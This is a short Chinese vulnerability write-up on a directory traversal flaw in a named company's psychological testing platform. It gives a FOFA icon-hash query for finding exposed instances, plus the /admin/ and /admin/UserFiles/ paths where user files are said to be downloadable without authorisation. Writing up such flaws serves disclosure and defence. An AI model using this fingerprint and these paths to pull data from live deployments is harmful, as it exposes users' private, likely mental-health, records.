安徽阳光心健_心理测量平台_目录遍历漏洞-棉花糖会员站

# 安徽阳光心健心理测量平台目录遍历漏洞

## 漏洞描述

安徽阳光心健心理咨询有限公司心理测量平台存在目录遍历漏洞，攻击者可利用该漏洞获取敏感信息。

## 漏洞影响

> 安徽阳光心健心理测量平台

## FOFA

> icon_hash=”-320896955″

## 漏洞复现

主页如下

![xl-1](/static/qingy/安徽阳光心健_心理测量平台_目录遍历漏洞/img/xl-1.png)

扫描目录

![xl-2](/static/qingy/安徽阳光心健_心理测量平台_目录遍历漏洞/img/xl-2.png)

访问 http://xxx.xxx.xxx.xxx/admin/

![xl-3](/static/qingy/安徽阳光心健_心理测量平台_目录遍历漏洞/img/xl-3.png)

其中 http://xxx.xxx.xxx.xxx/admin/UserFiles/ 中还包含了用户信息可未授权下载

![xl-4](/static/qingy/安徽阳光心健_心理测量平台_目录遍历漏洞/img/xl-4.png)

文章版权归作者所有，未经允许请勿转载。

THE END

安徽阳光心健_心理测量平台_目录遍历漏洞